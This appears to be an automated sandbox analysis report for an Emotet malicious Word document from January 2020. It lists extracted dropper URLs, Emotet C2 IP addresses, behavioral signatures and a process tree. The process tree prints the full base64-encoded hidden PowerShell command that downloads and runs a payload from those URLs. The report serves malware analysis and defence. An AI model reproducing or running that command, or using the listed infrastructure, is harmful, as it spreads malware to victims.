Analysis

  • max time kernel
    26s
  • resource
    win10v191014
  • submitted
    20-01-2020 10:34

General

  • Target

    d563d2ca938193a5c92baa0fadbb293f052986310aa3df2d4ead7f249989fdd6

  • Sample

    200120-ab53w14xns

  • SHA256

    d563d2ca938193a5c92baa0fadbb293f052986310aa3df2d4ead7f249989fdd6

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://blog.hasilkan.com/cgi-bin/LxoH/

exe.dropper

http://luatsusaigon.info/libs/zgis/

exe.dropper

https://primalis.com.vn/wp-content/uploads/2020/rxm/

exe.dropper

https://womenhealth.aureliusconferences.com/events/bYIkt2OE/

exe.dropper

https://travelciwidey.com/wp-includes/kaU705/

Extracted

Family

emotet

C2

100.6.23.40:80

200.71.200.4:443

190.114.244.182:443

91.250.96.22:8080

37.187.72.193:8080

104.131.44.150:8080

167.71.10.37:8080

110.36.217.66:8080

206.81.10.215:8080

93.147.141.5:443

60.250.78.22:443

92.222.216.44:8080

95.213.236.64:8080

27.109.153.201:8090

66.7.242.50:8080

5.196.74.210:8080

181.143.126.170:80

209.97.168.52:8080

206.189.112.148:8080

64.53.242.181:8080

rsa_pubkey.plain

Signatures

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d563d2ca938193a5c92baa0fadbb293f052986310aa3df2d4ead7f249989fdd6.doc" /o ""
    1⤵
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    PID:5004
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABNAGkAagBtAGwAdwBjAGYAegA9ACcAWQB3AHAAbwBnAGwAbgB6AGwAZQB2AGIAeAAnADsAJABNAG0AZABlAGIAYwBzAGoAcABkAGkAeQBuACAAPQAgACcANAA1ACcAOwAkAFcAYgBkAHMAdwBwAHgAbwBqAD0AJwBCAGMAagBnAGQAbQBlAGUAdwB1AGEAeAAnADsAJABRAGwAZgBsAHIAawB1AGMAYQByAHIAZwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATQBtAGQAZQBiAGMAcwBqAHAAZABpAHkAbgArACcALgBlAHgAZQAnADsAJABPAHQAYQBxAGgAbQBtAGkAcQBnAD0AJwBaAGEAaQB6AGIAZgB6AHIAbQB3AGIAeAByACcAOwAkAE8AbgBqAHYAcQB6AHYAYwBhAHoAbQBjAHcAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4AZQB0AC4AdwBFAEIAYwBsAEkARQBOAHQAOwAkAEoAcQBoAG0AbwBsAGwAagBpAHMAeQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AaABhAHMAaQBsAGsAYQBuAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ATAB4AG8ASAAvACoAaAB0AHQAcAA6AC8ALwBsAHUAYQB0AHMAdQBzAGEAaQBnAG8AbgAuAGkAbgBmAG8ALwBsAGkAYgBzAC8AegBnAGkAcwAvACoAaAB0AHQAcABzADoALwAvAHAAcgBpAG0AYQBsAGkAcwAuAGMAbwBtAC4AdgBuAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwAyADAAMgAwAC8AcgB4AG0ALwAqAGgAdAB0AHAAcwA6AC8ALwB3AG8AbQBlAG4AaABlAGEAbAB0AGgALgBhAHUAcgBlAGwAaQB1AHMAYwBvAG4AZgBlAHIAZQBuAGMAZQBzAC4AYwBvAG0ALwBlAHYAZQBuAHQAcwAvAGIAWQBJAGsAdAAyAE8ARQAvACoAaAB0AHQAcABzADoALwAvAHQAcgBhAHYAZQBsAGMAaQB3AGkAZABlAHkALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGsAYQBVADcAMAA1AC8AJwAuACIAcwBwAGAAbABpAHQAIgAoACcAKgAnACkAOwAkAFcAZwBtAHYAZQBnAGgAaQB3AHcAeABiAD0AJwBTAG0AZABkAGgAbQBkAHYAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQAWQBzAGEAeQB4AHIAeQBmAHoAIABpAG4AIAAkAEoAcQBoAG0AbwBsAGwAagBpAHMAeQApAHsAdAByAHkAewAkAE8AbgBqAHYAcQB6AHYAYwBhAHoAbQBjAHcALgAiAGQAbwBXAGAATgBgAGwAYABPAGEAZABGAGkAbABFACIAKAAkAFkAcwBhAHkAeAByAHkAZgB6ACwAIAAkAFEAbABmAGwAcgBrAHUAYwBhAHIAcgBnACkAOwAkAFgAZQB5AHMAcwBkAHoAcwB0AHAAYgBlAD0AJwBQAHMAcwBtAGMAZQBkAGQAawB1AGsAeAB1ACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAUQBsAGYAbAByAGsAdQBjAGEAcgByAGcAKQAuACIATABgAGUATgBHAHQAaAAiACAALQBnAGUAIAAyADcAMgA4ADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGEAYABSAHQAIgAoACQAUQBsAGYAbAByAGsAdQBjAGEAcgByAGcAKQA7ACQAQQBrAHQAYQBoAGIAaQBwAGQAdAB4AD0AJwBTAHEAaQB0AGUAcwB0AGwAJwA7AGIAcgBlAGEAawA7ACQATwByAHUAdQBlAGkAdQBpAHEAcABlAG8APQAnAEoAcgBuAGsAYwBpAGoAZwB1AGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQgBlAHEAcQBpAGQAcgBwAD0AJwBNAGgAZABoAGoAawBoAHQAeQBkACcA
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1628
    • C:\Users\Admin\45.exe
      "C:\Users\Admin\45.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4440
      • C:\Users\Admin\45.exe
        --9a306e6b
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:3780

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3780-11-0x0000000000710000-0x0000000000727000-memory.dmp

    Filesize

    92KB

  • memory/3780-12-0x0000000000400000-0x0000000000451000-memory.dmp

    Filesize

    324KB

  • memory/4440-8-0x00000000005F0000-0x0000000000607000-memory.dmp

    Filesize

    92KB